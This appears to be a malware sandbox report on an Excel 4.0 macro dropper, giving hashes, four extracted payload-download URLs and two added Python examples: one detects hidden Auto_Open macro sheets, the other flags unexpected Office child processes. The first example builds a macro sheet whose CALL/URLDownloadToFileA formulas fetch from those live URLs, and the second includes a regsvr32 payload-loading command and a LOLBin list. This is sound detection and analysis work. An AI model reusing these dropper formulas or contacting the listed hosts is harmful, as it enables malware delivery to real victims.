General

  • Target

    4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

  • Size

    96KB

  • Sample

    241111-vt4y8a1nav

  • MD5

    66433ea9840b53a161cc063ea988fc9d

  • SHA1

    f2e16a2fc15620523fdbbd5cc72a9c0e52af035e

  • SHA256

    4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

  • SHA512

    59368dcda3dfd6fb14f138fac99cc793d167fdc05d9c7634d8722d28f80ad78e74197c8d31c800cde51d3f9fbe9e572f5b1071090cc8f49e0585a4d11ca9e795

  • SSDEEP

    1536:7kKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg2HuS4hcTO97v7UYdEJmY:IKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgE

Score
10/10

Malware Config

Extracted

  • Family

    xlm40.dropper

  • Language

    xlm4.0

  • Source URLs (download locations carried in the Excel 4.0 macro, one per config row)

    https://atperson.com/campusvirtual/EOgFGo17w/
    https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/
    http://atici.net/c/JDFDBMIz/
    http://domesticuif.co.za/libraries/nbnH9dpd/
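The config above was pulled from an Excel 4.0 (XLM) macro. The following is an added example, not part of this report and not the sandbox's extractor: a small static triage routine for an OOXML (.xlsm) package that locates macro-sheet parts by content type, reads sheet visibility and the Auto_Open name from workbook.xml, dumps every macro-sheet formula and mines it for URLs. The package it parses is constructed inline for the example; its CALL() formulas, sheet names and local file name are made up, and only the four URLs come from the report. Real samples in this family are frequently legacy BIFF .xls files, which are not zip packages at all; for those, and for CHAR()/FORMULA-obfuscated macros that defeat a plain URL regex, use oletools (olevba) instead.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
XM_NS = "http://schemas.microsoft.com/office/excel/2006/main"
REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
URL_RE = re.compile(r'https?://[^\s"\'<>()]+')

# Constructed package, not the analysed sample: one visible worksheet, one
# veryHidden Excel 4.0 macro sheet, an Auto_Open name pointing at it, and
# illustrative CALL() formulas that reference the four URLs from the report.
# The formulas, sheet names and "..\payload.dll" are invented for this example.
CONSTRUCTED_PARTS = {
    "[Content_Types].xml": (
        f'<Types xmlns="{CT_NS}">'
        '<Override PartName="/xl/workbook.xml" ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/>'
        '<Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>'
        '<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>'
        "</Types>"
    ),
    "xl/workbook.xml": (
        f'<workbook xmlns="{MAIN_NS}" xmlns:r="{REL_NS}"><sheets>'
        '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
        '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
        "</sheets><definedNames>"
        '<definedName name="_xlnm.Auto_Open">Macro1!$A$1</definedName>'
        "</definedNames></workbook>"
    ),
    "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{MAIN_NS}"><sheetData/></worksheet>',
    "xl/macrosheets/sheet1.xml": (
        f'<xm:macrosheet xmlns="{MAIN_NS}" xmlns:xm="{XM_NS}"><sheetData>'
        '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://atperson.com/campusvirtual/EOgFGo17w/","..\\payload.dll",0,0)</f></c></row>'
        '<row r="2"><c r="A2"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://eliteturismo.com/phpmailer-old/dafdBxQONtk5Uf9dxll/","..\\payload.dll",0,0)</f></c></row>'
        '<row r="3"><c r="A3"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://atici.net/c/JDFDBMIz/","..\\payload.dll",0,0)</f></c></row>'
        '<row r="4"><c r="A4"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://domesticuif.co.za/libraries/nbnH9dpd/","..\\payload.dll",0,0)</f></c></row>'
        '<row r="5"><c r="A5"><f>HALT()</f></c></row>'
        "</sheetData></xm:macrosheet>"
    ),
}


def build_package(parts):
    """Zip the XML parts into an in-memory OOXML package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


def analyze_xlsm(data):
    """Collect macro-sheet parts, hidden sheets, Auto_Open, formulas and URLs."""
    result = {"macrosheets": [], "hidden_sheets": [], "auto_open": False,
              "formulas": [], "urls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        # Excel 4.0 macro sheets are separate parts with their own content type.
        if "[Content_Types].xml" in names:
            ct = ET.fromstring(zf.read("[Content_Types].xml"))
            for ov in ct.iter(f"{{{CT_NS}}}Override"):
                if "macrosheet" in ov.get("ContentType", ""):
                    result["macrosheets"].append(ov.get("PartName", "").lstrip("/"))
        # Fall back on part names in case the content-types part was edited.
        for name in names:
            if name.startswith("xl/macrosheets/") and name not in result["macrosheets"]:
                result["macrosheets"].append(name)
        result["macrosheets"].sort()
        # Visibility ("hidden"/"veryHidden") and auto-run names live in workbook.xml.
        if "xl/workbook.xml" in names:
            wb = ET.fromstring(zf.read("xl/workbook.xml"))
            for sheet in wb.iter(f"{{{MAIN_NS}}}sheet"):
                state = sheet.get("state", "visible")
                if state != "visible":
                    result["hidden_sheets"].append((sheet.get("name"), state))
            for dn in wb.iter(f"{{{MAIN_NS}}}definedName"):
                if (dn.get("name") or "").lower().endswith("auto_open"):
                    result["auto_open"] = True
        # Every <f> element in a macro sheet is one XLM formula.
        for part in result["macrosheets"]:
            if part in names:
                for f in ET.fromstring(zf.read(part)).iter(f"{{{MAIN_NS}}}f"):
                    if f.text:
                        result["formulas"].append(f.text)
    for formula in result["formulas"]:
        for url in URL_RE.findall(formula):
            if url not in result["urls"]:
                result["urls"].append(url)
    return result


def xlm_indicators(result):
    """Reduce the parsed facts to the flags an analyst triages on."""
    flags = []
    if result["macrosheets"]:
        flags.append("excel4-macrosheet")
    if result["hidden_sheets"]:
        flags.append("hidden-sheet")
    if result["auto_open"]:
        flags.append("auto-open")
    if any("URLDownloadToFile" in f for f in result["formulas"]):
        flags.append("download-call")
    if result["urls"]:
        flags.append("embedded-url")
    return flags


if __name__ == "__main__":
    report = analyze_xlsm(build_package(CONSTRUCTED_PARTS))
    print(xlm_indicators(report))
    print("\n".join(report["urls"]))
```

The three checks are deliberately independent: a macro sheet that is merely present is not enough on its own, but a veryHidden macro sheet reached through `_xlnm.Auto_Open` and calling `URLDownloadToFileA` is the shape of this dropper, and each of those facts is readable from the package without evaluating any macro.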

Targets

    • Target

      4f5ea57f17a6fbca2d4638dfa154f2e60e6609f83a1cf6f71466c9fd09d468e4

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.
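The signature above fires on a parent/child relationship, not on the child's own behaviour. As an added example (not the sandbox's rule and not tied to this sample's actual process tree), the following generalises that check into the parent-child detection a SOC would run over endpoint telemetry: any Office host process spawning a child outside a small expected set is flagged, and the well-known script hosts and loaders are raised to high severity. The events are constructed Sysmon-style process-creation records with made-up paths and command lines; the expected-children and Office-host sets are assumptions to tune per environment.

```python
# Constructed Sysmon-style process-creation records (Event ID 1 field names).
# They are not the sandbox's real events; every path and command line is made up.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'"EXCEL.EXE" C:\Users\user\Downloads\invoice.xls'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\user\AppData\Local\Temp\payload.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo hello"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Users\user\AppData\Local\Temp\update.exe",
     "CommandLine": r"update.exe"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# Office document hosts whose children are worth scrutinising (assumption).
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "msaccess.exe",
                "outlook.exe", "mspub.exe"}
# Children Office legitimately spawns in this environment (assumption; tune per fleet).
EXPECTED_CHILDREN = {"splwow64.exe", "dw20.exe"}
# Script hosts and loaders that a macro typically reaches for.
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe",
           "msiexec.exe", "bitsadmin.exe", "schtasks.exe"}


def image_name(path):
    """Lower-cased file name of an image path, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict for an unexpected Office child process, else None."""
    parent = image_name(event["ParentImage"])
    child = image_name(event["Image"])
    if parent not in OFFICE_HOSTS or child in EXPECTED_CHILDREN:
        return None
    severity = "high" if child in LOLBINS else "medium"
    return {"parent": parent, "child": child, "severity": severity,
            "command_line": event["CommandLine"]}


def scan(events):
    """Run the parent/child check over a batch of process-creation events."""
    return [hit for hit in map(classify, events) if hit]


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(f'[{hit["severity"]}] {hit["parent"]} -> {hit["child"]}: {hit["command_line"]}')
```

An unknown binary launched from a user-writable directory is kept at medium rather than dropped, because a dropper's downloaded payload will not be on any LOLBin list; the allowlist, not the LOLBin list, is what keeps this rule quiet.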

MITRE ATT&CK Enterprise v15

Tasks